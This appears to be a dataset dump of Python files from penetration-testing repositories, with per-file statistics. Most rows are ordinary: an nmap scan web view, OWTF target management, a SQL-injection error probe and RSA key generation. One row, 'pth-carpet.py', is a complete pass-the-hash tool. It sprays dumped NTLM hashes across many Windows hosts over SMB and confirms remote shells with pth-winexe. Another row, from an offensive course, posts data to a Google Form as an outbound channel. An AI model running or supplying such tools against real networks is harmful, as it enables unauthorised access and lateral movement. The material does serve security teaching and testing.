repo_name (string, 29 classes) | text (string, length 18–367k) | avg_line_length (float64, 5.6–132) | max_line_length (int64, 11–3.7k) | alphanum_fraction (float64, 0.28–0.94) |
---|---|---|---|---|
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-17
# @File : port_scanner.py
# @Desc : ""
import threading
import time
from flask import Blueprint, render_template, request, redirect, url_for, jsonify
from bson import ObjectId
from lib.mongo_db import connectiondb, db_name_conf
from fuxi.views.authenticate import login_check
from fuxi.views.modules.port_scanner.nmap_scanner import nmap_scanner
from instance import config_name
port_scanner = Blueprint('port_scanner', __name__)
config_db = db_name_conf()['config_db']
port_db = db_name_conf()['port_db']
# port_scanner
@port_scanner.route('/port-scanner', methods=['GET', 'POST'])
@login_check
def port_view():
if request.method == "GET":
if request.args.get("scan_id"):
# default port scan result
target_id = request.args.get("scan_id")
db_course = connectiondb(port_db).find_one({"_id": ObjectId(target_id)})
host = db_course['host']
port = db_course['port']
if db_course['status'] == "Done":
result = '\n'.join('%s' % c for c in db_course['detail']).replace(';', " ")
else:
result = "Scanning, Please wait..."
return render_template('port-scanner.html', host=host, result=result, port=port)
elif request.args.get("result"):
# table view port scan result
scan_id = request.args.get("result")
db_course = connectiondb(port_db).find_one({"_id": ObjectId(scan_id)})
result = '\n'.join('%s' % c for c in db_course['detail'])
return result
elif request.args.get('delete'):
# scan task delete
scan_id = request.args.get("delete")
connectiondb(port_db).delete_one({"_id": ObjectId(scan_id)})
return redirect(url_for('port_scanner.port_view'))
# default scan view
port_list = connectiondb(config_db).find_one({"config_name": config_name})['port_list']
ports = ','.join('%s' % port for port in port_list)
return render_template('port-scanner.html', port_list=ports)
else:
# add scan
if request.form.get('source') == "new_scan":
target_val = request.form.get('target_val')
arguments_val = int(request.form.get('arguments_val'))
port_val = request.form.get('port_val')
if len(port_val) > 0:
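# arguments_val maps the scan-type dropdown to an nmap command line:
# 0 = TCP connect scan, 1 = connect scan reporting only open ports,
# 2 = SYN scan without host discovery (-Pn), 3 = connect scan with service/OS detection.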
if arguments_val == 0:
arguments = "-sT -T4 -p " + port_val
elif arguments_val == 1:
arguments = "-sT -T4 --open -p " + port_val
elif arguments_val == 2:
arguments = "-sS -T4 -Pn -p " + port_val
elif arguments_val == 3:
arguments = "-sT -sV -O -A -p " + port_val
else:
arguments = ""
# use default port
else:
if arguments_val == 0:
arguments = "-sT -T4"
elif arguments_val == 1:
arguments = "-sT -T4 --open"
elif arguments_val == 2:
arguments = "-sS -T4 -Pn "
elif arguments_val == 3:
arguments = "-sT -sV -O -A"
else:
arguments = ""
db_data = {
"host": target_val,
"status": "Preparation",
'port': port_val,
"arguments": arguments,
'detail': "",
'date': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
}
scan_id = connectiondb(port_db).insert_one(db_data).inserted_id
t1 = threading.Thread(target=nmap_scanner, args=(target_val, arguments, scan_id))
t1.start()
return jsonify({
"result": "success",
"scan_id": str(scan_id),
})
| 40.010309 | 95 | 0.515212 |
cybersecurity-penetration-testing | __author__ = 'Preston Miller & Chapin Bryce'
import csv_writer
import kml_writer
import xlsx_writer
| 16 | 44 | 0.752475 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Simple script intended to perform Carpet Bombing against a list of provided
# machines using a list of provided LSA hashes (LM:NTLM).
# The basic idea behind a Pass-The-Hash attack is to take one hash and use it
# against one machine. The problem with that approach is not knowing in advance
# which machine the hash would actually work against.
# This script was written to address that issue.
#
# Requirements:
# This script requires the 'pth-winexe' utility (or winexe renamed to 'pth-winexe') to be
# present on the system when the script is invoked. If the utility is not present, no
# further check of the ability to run commands via the PTH attack will be performed.
# Also, modules such as:
# - impacket
#
# Notice:
# This script can only verify the exploitability of Windows boxes. Against other
# systems (e.g. boxes running Samba), pth-winexe will not yield satisfying results.
#
# Usage:
# $ ./pth-carpet.py machines.txt pwdump
#
# coded by:
# Mariusz Banach, 2016 / mgeeky
# version 0.2
#
# Should be working on Windows boxes as well as on Linux ones.
#
from __future__ import print_function
import os
import sys
import argparse
import signal
import logging
import threading
import subprocess
import multiprocessing
from termcolor import colored
from functools import partial
from multiprocessing.managers import BaseManager
from impacket.dcerpc.v5 import transport
WORKERS = multiprocessing.cpu_count() * 4
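# Four worker processes per CPU core; each worker takes one target machine and tries
# every supplied hash against it (see worker() below).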
TIMEOUT = 10
OPTIONS = None
LOCK = multiprocessing.Lock()
def info(txt):
with LOCK:
print (txt)
def success(txt):
info(colored('[+] '+txt, 'green', attrs=['bold']))
def warning(txt):
info(colored('[*] '+txt, 'yellow'))
def verbose(txt):
if OPTIONS.v:
info(colored('[?] '+txt, 'white'))
def err(txt):
info(colored('[!] '+txt, 'red'))
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.output = ''
self.error = ''
verbose( '\tCalling: "%s"' % cmd)
def get_output(self):
return self.output, self.error
def run(self, stdin, timeout):
def target():
self.process = subprocess.Popen(self.cmd, shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
self.output, self.error = self.process.communicate(stdin)
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return False
else:
return True
def init_worker():
# http://stackoverflow.com/a/6191991
signal.signal(signal.SIGINT, signal.SIG_IGN)
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
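# check_rce() below spawns pth-winexe with a user%hash credential pair and looks for a
# Windows cmd.exe banner in the output to confirm that remote command execution works.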
def check_rce(host, username, hash, port):
verbose('\tChecking whether provided hash can be used to PTH remote code execution')
if cmd_exists('pth-winexe'):
userswitch = '%s%%%s' % (username, hash)
c = Command('pth-winexe -U %s //%s cmd' % (userswitch, host))
if c.run('exit\n', TIMEOUT):
pass
else:
verbose('\tPTH-Winexe had to be terminated.')
out, error = c.get_output()
if 'Microsoft' in out and '(C) Copyright' in out and '[Version' in out:
return True
else:
errorm = error[error.find('NT_STATUS'):].strip()
if not errorm.startswith('NT_STATUS'):
if 'NT_STATUS' in error:
errorm = error
else:
errorm = 'Unknown error'
if OPTIONS.v:
err('\tCould not spawn shell using PTH: ' + errorm)
else:
warning('\tPlease check manually whether the above hash grants access to a writable IPC$ share that would allow executing cmd.')
return False
def login(host, username, hash, port):
stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % host
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
lmhash, nthash = hash.split(':')
rpctransport.set_credentials(username, '', '', lmhash, nthash, None)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
return check_rce(host, username, hash, port)
except Exception, e:
raise e
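# pwdump files mark missing LM or NT halves with asterisks; correct_hash() replaces such
# halves with 32 zeros before the hash is split and handed to set_credentials().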
def correct_hash(hash):
lmhash, nthash = hash.split(':')
if '*' in lmhash:
lmhash = '0' * 32
if '*' in nthash:
nthash = '0' * 32
return lmhash + ':' + nthash
def worker(stopevent, pwdump, machine):
for user, hash in pwdump.items():
if stopevent.is_set():
break
hash = correct_hash(hash)
try:
if login(machine, user, hash, OPTIONS.port):
success('Pass-The-Hash with shell spawned: %s@%s (%s)' % (user, machine, hash))
else:
if OPTIONS.v:
warning('Connected using PTH but couldn\'t spawn shell: %s@%s (%s)' % (user, machine, hash))
except Exception, e:
verbose('Hash was not accepted: %s@%s (%s)\n\t%s' % (user, machine, hash, str(e)))
def main():
global OPTIONS
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz Banach, 2016\n', 'white', attrs=['bold']))
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')
parser.add_argument('hashes', nargs='?', help='Specifies input file containing list of dumped hashes in pwdump format')
parser.add_argument('-v', action='store_true', help='Verbose mode')
parser.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar='smb port', help='Destination port used to connect into SMB Server')
if len(sys.argv) < 3:
parser.print_help()
sys.exit(1)
OPTIONS = parser.parse_args()
machines = [x.strip() for x in open(OPTIONS.rhosts).readlines() ]
rawpwdump = [x.strip() for x in open(OPTIONS.hashes).readlines() ]
pwdump = {}
for p in rawpwdump:
try:
user = p.split(':')[0]
hash = p.split(':')[2] + ':' + p.split(':')[3]
except:
err('Supplied hashes file does not conform PWDUMP format!')
err('\tIt must be like this: <user>:<id>:<lmhash>:<nthash>:...')
sys.exit(1)
pwdump[user] = hash
warning('Testing %d hashes against %d machines. Resulting in total in %d PTH attempts\n' \
% (len(pwdump), len(machines), len(pwdump) * len(machines)))
stopevent = multiprocessing.Manager().Event()
try:
pool = multiprocessing.Pool(WORKERS, init_worker)
func = partial(worker, stopevent, pwdump)
pool.map_async(func, machines)
pool.close()
pool.join()
except KeyboardInterrupt:
pool.terminate()
pool.join()
success('\nUser interrupted the script.')
if __name__ == '__main__':
main()
| 31.707207 | 190 | 0.619972 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
def main():
num_1=input("Enter First number : ")
num_2=input("Enter Second number : ")
sum_=num_1+num_2
print("Sum is : "+str(sum_))
print("Surprised !! ,input() returns String")
print("Actuall sum : " +str(int(num_1)+int(num_2)))
main()
| 19.769231 | 52 | 0.620818 |
owtf | """
owtf.managers.target
~~~~~~~~~~~~~~~~~~~~
"""
import logging
import os
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from owtf.db.session import get_count, get_scoped_session
from owtf.lib.exceptions import (
DBIntegrityException,
InvalidParameterType,
InvalidTargetReference,
UnresolvableTargetException,
)
from owtf.models.command import Command
from owtf.models.session import Session
from owtf.models.target import Target
from owtf.managers.session import add_target_to_session, session_required
from owtf.plugin.params import plugin_params
from owtf.settings import OUTPUT_PATH
from owtf.utils.file import (
cleanup_target_dirs,
create_output_dir_target,
get_target_dir,
)
from owtf.utils.ip import get_ip_from_hostname, get_ips_from_hostname
from owtf.utils.strings import str2bool, to_str
TARGET_CONFIG = {
"id": 0,
"target_url": "",
"host_name": "",
"host_path": "",
"url_scheme": "",
"port_number": "", # In str form
"host_ip": "",
"alternative_ips": "", # str(list), so it can easily reversed using list(str)
"ip_url": "",
"top_domain": "",
"top_url": "",
"scope": True,
"max_user_rank": -1,
"max_owtf_rank": -1,
}
PATH_CONFIG = {
"partial_url_output_path": "",
"host_output": "",
"port_output": "",
"url_output": "",
"plugin_output_dir": "",
}
def target_required(func):
"""
In order to use this decorator on a `method` there are two requirements
+ target_id must be a kwarg of the function
+ Core must be attached to the object at Core
All this decorator does is check if a valid value is passed for target_id
if not get the target_id from target manager and pass it
"""
def wrapped_function(*args, **kwargs):
if "target_id" not in kwargs:
kwargs["target_id"] = target_manager.get_target_id
return func(*args, **kwargs)
return wrapped_function
@target_required
def command_already_registered(session, original_command, target_id=None):
"""Checks if the command has already been registered
:param original_command: Original command to check
:type original_command: `dict`
:param target_id: Target ID
:type target_id: `int`
:return: None
:rtype: None
"""
from owtf.managers.poutput import plugin_output_exists
if target_id is not None:
target_manager.set_target(target_id)
register_entry = session.query(Command).get(original_command)
if register_entry:
# If the command was completed and the plugin output to which it
# is referring exists
if register_entry.success:
if plugin_output_exists(
session, register_entry.plugin_key, register_entry.target_id
):
return get_target_url_for_id(session, register_entry.target_id)
else:
Command.delete_cmd(session, original_command)
return None
else: # Command failed
Command.delete_cmd(session, original_command)
return get_target_url_for_id(session, register_entry.target_id)
return None
class TargetManager(object):
# All these variables reflect to current target which is referenced by a unique ID
target_id = None
target_config = dict(TARGET_CONFIG)
path_config = dict(PATH_CONFIG)
def __init__(self):
self.session = get_scoped_session()
def set_target(self, target_id):
"""Set a target by ID
:param target_id: target ID
:type target_id: `int`
:return: None
:rtype: None
"""
try:
self.target_id = target_id
self.target_config = get_target_config_by_id(self.session, target_id)
self.path_config = self.get_path_configs(self.target_config)
except InvalidTargetReference:
raise InvalidTargetReference(
"0. Target doesn't exist: {!s}".format(target_id)
)
def get_path_configs(self, target_config):
"""Get paths to output directories
:param target_config: Target config
:type target_config: `dict`
:return: Path config
:rtype: `dict`
"""
path_config = {}
# Set the output directory.
path_config["host_output"] = os.path.join(OUTPUT_PATH, target_config["host_ip"])
path_config["port_output"] = os.path.join(
path_config["host_output"], target_config["port_number"]
)
# Set the URL output directory (plugins will save their data here).
path_config["url_output"] = os.path.join(
get_target_dir(target_config["target_url"])
)
# Set the partial results path.
path_config["partial_url_output_path"] = os.path.join(
path_config["url_output"], "partial"
)
return path_config
@property
def get_target_id(self):
"""Return target ID
:return: target ID
:rtype: `int`
"""
return self.target_id
def get_val(self, key):
"""Get value of the key from target config
:param key: Key
:type key: `str`
:return: Value
:rtype: `str` #?
"""
return self.target_config[key]
def get_target_url(self):
"""Return target URL
:return: Target URL
:rtype: `str`
"""
return self.get_val("target_url")
def get_target_urls(self):
"""Return target URLs
:return: List of target urls
:rtype: `list`
"""
return get_all_targets(self.session, "target_url")
@property
def get_target_config(self):
"""Return target config
:return: Target config
:rtype: `dict`
"""
return self.target_config
@property
def get_path_config(self):
"""Return path config
:return: Path config
:rtype: `dict`
"""
return self.path_config
def get_path(self, output_type):
return self.path_config.get(output_type, None)
def set_path(self, output_type, path):
# Mainly used for setting output paths for individual plugins, which
# need not be saved: plugin_output_dir.
self.path_config[output_type] = path
@session_required
def add_target(session, target_url, session_id=None):
"""Adds a target to session
:param target_url: Target url
:type target_url: `str`
:param session_id: session ID
:type session_id: `int`
:return: None
:rtype: None
"""
if target_url not in get_all_targets(session, "target_url"):
# A try-except can be used here, but then ip-resolution takes time
# even if target is present
target_config = derive_config_from_url(target_url)
config_obj = Target(target_url=target_url)
config_obj.host_name = target_config["host_name"]
config_obj.host_path = target_config["host_path"]
config_obj.url_scheme = target_config["url_scheme"]
config_obj.port_number = target_config["port_number"]
config_obj.host_ip = target_config["host_ip"]
config_obj.alternative_ips = str(target_config["alternative_ips"])
config_obj.ip_url = target_config["ip_url"]
config_obj.top_domain = target_config["top_domain"]
config_obj.top_url = target_config["top_url"]
session.add(config_obj)
config_obj.sessions.append(session.query(Session).get(session_id))
session.commit()
target_id = config_obj.id
create_missing_dirs_target(target_url)
target_manager.set_target(target_id)
else:
session_obj = session.query(Session).get(session_id)
target_obj = session.query(Target).filter_by(target_url=target_url).one()
if session_obj in target_obj.sessions:
raise DBIntegrityException(
"{!s} already present in Target DB & session".format(target_url)
)
else:
add_target_to_session(session, target_obj.id, session_id=session_obj.id)
@session_required
def add_targets(session, target_urls, session_id=None):
"""Add multiple targets
:param target_urls: List of target urls
:type target_urls: `list`
:param session_id: session ID
:type session_id: `int`
:return: None
:rtype: None
"""
for target_url in target_urls:
add_target(session, to_str(target_url), session_id=session_id)
def update_target(session, data_dict, target_url=None, id=None):
"""Update a target in the DB
:param data_dict: Modified data
:type data_dict: `dict`
:param target_url: Target url
:type target_url: `str`
:param id: Target ID
:type id: `int`
:return: None
:rtype: None
"""
target_obj = None
if id:
target_obj = session.query(Target).get(id)
if target_url:
target_obj = session.query(Target).filter_by(target_url=target_url).one()
if not target_obj:
raise InvalidTargetReference(
"2. Target doesn't exist: {!s}".format(id) if id else str(target_url)
)
# TODO: Updating all related attributes when one attribute is changed
if data_dict.get("scope", None) is not None:
target_obj.scope = str2bool(data_dict.get("scope", None))
session.commit()
def delete_target(session, target_url=None, id=None):
"""Delete a target from DB
:param target_url: target URL
:type target_url: `str`
:param id: Target ID
:type id: `int`
:return: None
:rtype: None
"""
target_obj = None
if id:
target_obj = session.query(Target).get(id)
if target_url:
target_obj = session.query(Target).filter_by(target_url=target_url).one()
if not target_obj:
raise InvalidTargetReference(
"3. Target doesn't exist: {!s}".format(id) if id else str(target_url)
)
if target_obj:
target_url = target_obj.target_url
session.delete(target_obj)
session.commit()
cleanup_target_dirs(target_url)
def create_missing_dirs_target(target_url):
"""Creates missing output dirs for target
:param target_url: Target URL
:type target_url: `str`
:return: None
:rtype: None
"""
create_output_dir_target(target_url)
def get_target_url_for_id(session, id):
"""Get target URL by target ID
:param id: target ID
:type id: `int`
:return: Target url
:rtype: `str`
"""
target_obj = session.query(Target).get(id)
if not target_obj:
logging.info("Failing with ID: %s" % str(id))
raise InvalidTargetReference("1. Target doesn't exist with ID: {!s}".format(id))
return target_obj.target_url
def get_target_config_by_id(session, id):
"""Get target config by id
:param id: Target id
:type id: `int`
:return: Config dict
:rtype: `dict`
"""
target_obj = session.query(Target).get(id)
if not target_obj:
raise InvalidTargetReference("5. Target doesn't exist: {!s}".format(id))
return get_target_config_dict(target_obj)
def target_gen_query(session, filter_data, session_id, for_stats=False):
"""Generate query
:param filter_data: Filter data
:type filter_data: `dict`
:param session_id: session ID
:type session_id: `int`
:param for_stats: true/false
:type for_stats: `bool`
:return:
:rtype:
"""
query = session.query(Target).filter(Target.sessions.any(id=session_id))
if filter_data.get("search") is not None:
if filter_data.get("target_url", None):
if isinstance(filter_data.get("target_url"), list):
filter_data["target_url"] = filter_data["target_url"][0]
query = query.filter(
Target.target_url.like("%%{!s}%%".format(filter_data["target_url"]))
)
else:
if filter_data.get("target_url", None):
if isinstance(filter_data["target_url"], str):
query = query.filter_by(target_url=filter_data["target_url"])
if isinstance(filter_data["target_url"], list):
query = query.filter(
Target.target_url.in_(filter_data.get("target_url"))
)
if filter_data.get("host_ip", None):
if isinstance(filter_data["host_ip"], str):
query = query.filter_by(host_ip=filter_data["host_ip"])
if isinstance(filter_data["host_ip"], list):
query = query.filter(Target.host_ip.in_(filter_data.get("host_ip")))
if filter_data.get("scope", None):
filter_data["scope"] = filter_data["scope"][0]
query = query.filter_by(scope=str2bool(filter_data.get("scope")))
if filter_data.get("host_name", None):
if isinstance(filter_data["host_name"], str):
query = query.filter_by(host_name=filter_data["host_name"])
if isinstance(filter_data["host_name"], list):
query = query.filter(Target.host_name.in_(filter_data.get("host_name")))
if filter_data.get("id", None):
if isinstance(filter_data["id"], str):
query = query.filter_by(id=filter_data["id"])
if isinstance(filter_data["id"], list):
query = query.filter(Target.id.in_(filter_data.get("id")))
# This will allow new targets to be at the start
query = query.order_by(Target.id.desc())
if not for_stats: # query for stats shouldn't have limit and offset
try:
if filter_data.get("offset", None):
if isinstance(filter_data.get("offset"), list):
filter_data["offset"] = filter_data["offset"][0]
query = query.offset(int(filter_data["offset"]))
if filter_data.get("limit", None):
if isinstance(filter_data.get("limit"), list):
filter_data["limit"] = filter_data["limit"][0]
if int(filter_data["limit"]) != -1:
query = query.limit(int(filter_data["limit"]))
except ValueError:
raise InvalidParameterType(
"Invalid parameter type for target db for id[lt] or id[gt]"
)
return query
@session_required
def search_target_configs(session, filter_data=None, session_id=None):
"""Three things needed
+ Total number of targets
+ Filtered target dicts
+ Filtered number of targets
:param filter_data: Filter data
:type filter_data: `dict`
:param session_id: session id
:type session_id: `int`
:return: results
:rtype: `dict`
"""
total = get_count(session.query(Target).filter(Target.sessions.any(id=session_id)))
filtered_target_objs = target_gen_query(session, filter_data, session_id).all()
filtered_number = get_count(
target_gen_query(session, filter_data, session_id, for_stats=True)
)
results = {
"records_total": total,
"records_filtered": filtered_number,
"data": get_target_configs(filtered_target_objs),
}
return results
@session_required
def get_target_config_dicts(session, filter_data=None, session_id=None):
"""Get list of target config dicts
:param filter_data: Filter criteria
:type filter_data: `dict`
:param session_id: session ID
:type session_id: `int`
:return: List of target config dicts
:rtype: `list`
"""
if filter_data is None:
filter_data = {}
target_obj_list = target_gen_query(
session=session, filter_data=filter_data, session_id=session_id
).all()
return get_target_configs(target_obj_list)
def get_target_config_dict(target_obj):
"""Gets target config as a dict from object
:param target_obj: target object
:type target_obj:
:return: Target config
:rtype: `dict`
"""
target_config = dict(TARGET_CONFIG)
if target_obj:
for key in list(TARGET_CONFIG.keys()):
target_config[key] = getattr(target_obj, key)
return target_config
return None
def get_target_configs(target_obj_list):
"""Get target list of configs
:param target_obj_list: Target object list
:type target_obj_list: `list`
:return: List of target configs
:rtype: `list`
"""
target_configs = []
for target_obj in target_obj_list:
target_configs.append(get_target_config_dict(target_obj))
return target_configs
def get_targets_as_list(key_list):
"""Get everything as list
:param key_list: Target key list
:type key_list: `list`
:return: Values list
:rtype: `list`
"""
session = get_scoped_session()
values = []
for key in key_list:
values.append(get_all_targets(session, key))
return values
def get_all_targets(session, key):
"""Get all targets by key
:param key: Target key
:type key: `str`
:return:
:rtype:
"""
results = session.query(getattr(Target, key.lower())).all()
results = [result[0] for result in results]
return results
def get_all_in_scope(key):
"""Get all targets in scope by key
:param key: Key
:type key: `str`
:return: List of target keys
:rtype: `list`
"""
session = get_scoped_session()
results = session.query(getattr(Target, key.lower())).filter_by(scope=True).all()
results = [result[0] for result in results]
return results
def is_url_in_scope(url):
"""To avoid following links to other domains.
:param url: URL to check
:type url: `str`
:return: True if in scope
:rtype: `bool`
"""
parsed_url = urlparse(url)
# Get all known Host Names in Scope.
for host_name in get_all_in_scope(key="host_name"):
if parsed_url.hostname == host_name:
return True
return False
def load_targets(session, options):
"""Load targets into the DB
:param options: User supplied arguments
:type options: `dict`
:return: Added targets
:rtype: `list`
"""
scope = options["scope"]
if options["plugin_group"] == "auxiliary":
scope = get_aux_target()
added_targets = []
for target in scope:
try:
add_target(session=session, target_url=target)
added_targets.append(target)
except DBIntegrityException:
logging.warning("%s already exists in DB", target)
added_targets.append(target)
except UnresolvableTargetException as e:
logging.error("%s", e.parameter)
return added_targets
def get_aux_target():
"""This function returns the target for auxiliary plugins from the parameters provided
:param options: User supplied arguments
:type options: `dict`
:return: List of targets for aux plugins
:rtype: `list`
"""
# targets can be given by different params depending on the aux plugin we are running
# so "target_params" is a list of possible parameters by which user can give target
target_params = ["RHOST", "TARGET", "SMB_HOST", "BASE_URL", "SMTP_HOST"]
targets = None
if plugin_params.process_args():
for param in target_params:
if param in plugin_params.args:
targets = plugin_params.args[param]
break # it will capture only the first one matched
repeat_delim = ","
if targets is None:
logging.error(
"Aux target not found! See your plugin accepted parameters in ./plugins/ folder"
)
return []
if "REPEAT_DELIM" in plugin_params.args:
repeat_delim = plugin_params.args["REPEAT_DELIM"]
return targets.split(repeat_delim)
else:
return []
@session_required
def get_targets_by_severity_count(session, session_id=None):
"""Get targets by severity count
:param session_id: session ID
:type session_id: `int`
:return: data
:rtype: `dict`
"""
filtered_severity_objs = []
# "not ranked" = gray, "passing" = light green, "info" = light sky blue, "low" = blue, medium = yellow,
# high = red, critical = dark purple
severity_frequency = [
{"id": 0, "label": "Not Ranked", "value": 0, "color": "#A9A9A9"},
{"id": 1, "label": "Passing", "value": 0, "color": "#32CD32"},
{"id": 2, "label": "Info", "value": 0, "color": "#b1d9f4"},
{"id": 3, "label": "Low", "value": 0, "color": "#337ab7"},
{"id": 4, "label": "Medium", "value": 0, "color": "#ffcc00"},
{"id": 5, "label": "High", "value": 0, "color": "#c12e2a"},
{"id": 6, "label": "Critical", "value": 0, "color": "#800080"},
]
total = session.query(Target).filter(Target.sessions.any(id=session_id)).count()
target_objs = session.query(Target).filter(Target.sessions.any(id=session_id)).all()
for target_obj in target_objs:
if target_obj.max_user_rank != -1:
severity_frequency[target_obj.max_user_rank + 1]["value"] += 100 / total
else:
severity_frequency[target_obj.max_owtf_rank + 1]["value"] += 100 / total
for severity in severity_frequency:
if severity["value"] != 0:
filtered_severity_objs.append(severity)
return {"data": filtered_severity_objs}
def derive_config_from_url(target_url):
"""Automatically find target information based on target name.
.. note::
If target does not start with 'http' or 'https', then it is considered as a network target.
:param target_URL: Target url supplied
:type target_URL: `str`
:return: Target config dictionary
:rtype: `dict`
"""
target_config = dict(TARGET_CONFIG)
target_config["target_url"] = target_url
try:
parsed_url = urlparse(target_url)
if (
not parsed_url.hostname and not parsed_url.path
): # No hostname and no path, urlparse failed.
raise ValueError
except ValueError: # Occurs sometimes when parsing invalid IPv6 host for instance
raise UnresolvableTargetException("Invalid hostname '{!s}'".format(target_url))
host = parsed_url.hostname
if not host: # Happens when target is an IP (e.g. 127.0.0.1)
host = parsed_url.path # Use the path as host (e.g. 127.0.0.1 => host = '' and path = '127.0.0.1')
host_path = host
else:
host_path = parsed_url.hostname + parsed_url.path
url_scheme = parsed_url.scheme
protocol = parsed_url.scheme
if parsed_url.port is None: # Port is blank: Derive from scheme (default port set to 80).
try:
host, port = host.rsplit(":")
except ValueError: # Raised when target doesn't contain the port (e.g. google.fr)
port = "80"
if "https" == url_scheme:
port = "443"
else: # Port found by urlparse.
port = str(parsed_url.port)
# Needed for google resource search.
target_config["host_path"] = host_path
# Some tools need this!
target_config["url_scheme"] = url_scheme
# Some tools need this!
target_config["port_number"] = port
# Set the top URL.
target_config["host_name"] = host
host_ip = get_ip_from_hostname(host)
host_ips = get_ips_from_hostname(host)
target_config["host_ip"] = host_ip
target_config["alternative_ips"] = host_ips
ip_url = target_config["target_url"].replace(host, host_ip)
target_config["ip_url"] = ip_url
target_config["top_domain"] = target_config["host_name"]
hostname_chunks = target_config["host_name"].split(".")
if target_config["target_url"].startswith(
("http", "https")
): # target considered as hostname (web plugins)
if not target_config["host_name"] in target_config["alternative_ips"]:
target_config["top_domain"] = ".".join(hostname_chunks[1:])
# Set the top URL (get "example.com" from "www.example.com").
target_config["top_url"] = "{0}://{1}:{2}".format(protocol, host, port)
else: # target considered as IP (net plugins)
target_config["top_domain"] = ""
target_config["top_url"] = ""
return target_config
# Define the service
target_manager = TargetManager()
| 31.987738 | 107 | 0.61073 |
Python-for-Offensive-PenTest | '''
Caution
--------
Using this script for any malicious purpose is prohibited and against the law. Please read Google's terms and conditions carefully.
Use it at your own risk.
'''
# Python For Offensive PenTest
# Interacting with Google Forms
import requests # To install requests library, just type on the CMD: pip install requests
url = 'https://docs.google.com/forms/d/1Ndjnm5YViqIYXyIuoTHsCqW_YfGa-vaaKEahY2cc5cs/formResponse' # please replace the URL with your own google form :D
'''
notice that I added /formResponse to the end of the URL; this comes from the page's HTML source code.
As we can see below, the HTML form action contains /formResponse when the POST method is used to send the user data,
so we have to append this part when we automate the data submission:
<div class="ss-form"><form action="https://docs.google.com/forms/d/1Ndjnm5YViqIYXyIuoTHsCqW_YfGa-vaaKEahY2cc5cs/formResponse?pli=1"
method="POST" id="ss-form" target="_self" onsubmit=""><ol role="list" class="ss-question-list" style="padding-left: 0">
'''
form_data = {'entry.1542374001':'Hello from Python'}
'''
the textarea form name [which is entry.1301128713 here] can be taken from the HTML source code, as you can see in the line below;
please check the video for more info.
<textarea name="entry.1301128713" rows="8" cols="0" class="ss-q-long" id="entry_1301128713" dir="auto" aria-label="Isn't Python awesome?? "></textarea>
Note: the key (entry.1301128713) will vary on your google form, make sure you change it.
'''
r = requests.post(url, data=form_data)
# Submitting form-encoded data in requests:-
# http://docs.python-requests.org/en/latest/user/quickstart/#more-complicated-post-requests
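# Optional sanity check (not part of the original course snippet): Google normally answers
# with HTTP 200 when the form accepts the POST, so printing the status code is a quick way
# to confirm the submission went through.
print r.status_code  # expect 200 on success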
| 36.108696 | 156 | 0.747362 |
cybersecurity-penetration-testing | import sys
import time
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class Screenshot(QWebView):
def __init__(self):
self.app = QApplication(sys.argv)
QWebView.__init__(self)
self._loaded = False
self.loadFinished.connect(self._loadFinished)
def wait_load(self, delay=0):
while not self._loaded:
self.app.processEvents()
time.sleep(delay)
self._loaded = False
def _loadFinished(self, result):
self._loaded = True
def get_image(self, url):
self.load(QUrl(url))
self.wait_load()
frame = self.page().mainFrame()
self.page().setViewportSize(frame.contentsSize())
image = QImage(self.page().viewportSize(), QImage.Format_ARGB32)
painter = QPainter(image)
frame.render(painter)
painter.end()
return image
s = Screenshot()
image = s.get_image('http://www.packtpub.com')
image.save('website.png')
| 25 | 72 | 0.609082 |
cybersecurity-penetration-testing | import sys
def main():
"""
The main function uses sys.argv list to print any user supplied input.
:return: Nothing.
"""
args = sys.argv
print 'Script:', args[0]
args.pop(0)
for i, argument in enumerate(sys.argv):
print 'Argument {}: {}'.format(i, argument)
print 'Type: {}'.format(type(argument))
if __name__ == '__main__':
main()
| 22.705882 | 75 | 0.547264 |
Python-Penetration-Testing-for-Developers | import requests
url = "http://127.0.0.1/SQL/sqli-labs-master/Less-1/index.php?id="
initial = "'"
print "Testing "+ url
first = requests.post(url+initial)
if "mysql" in first.text.lower():
print "Injectable MySQL detected"
elif "native client" in first.text.lower():
print "Injectable MSSQL detected"
elif "syntax error" in first.text.lower():
print "Injectable PostGRES detected"
elif "ORA" in first.text.lower():
print "Injectable Oracle detected"
else:
print "Not Injectable :( " | 27.823529 | 66 | 0.725971 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
# Generate Keys
from Crypto.PublicKey import RSA
new_key = RSA.generate(4096 ) # generate RSA key that 4096 bits long
#Export the Key in PEM format, the PEM extension contains ASCII encoding
public_key = new_key.publickey().exportKey("PEM")
private_key = new_key.exportKey("PEM")
print private_key
print public_key
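# Optional (not in the original snippet): persist the exported keys so the client/server
# scripts that follow can load them from disk instead of pasting the PEM blocks.
# open('private_key.pem', 'w').write(private_key)
# open('public_key.pem', 'w').write(public_key)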
| 27.272727 | 72 | 0.756844 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
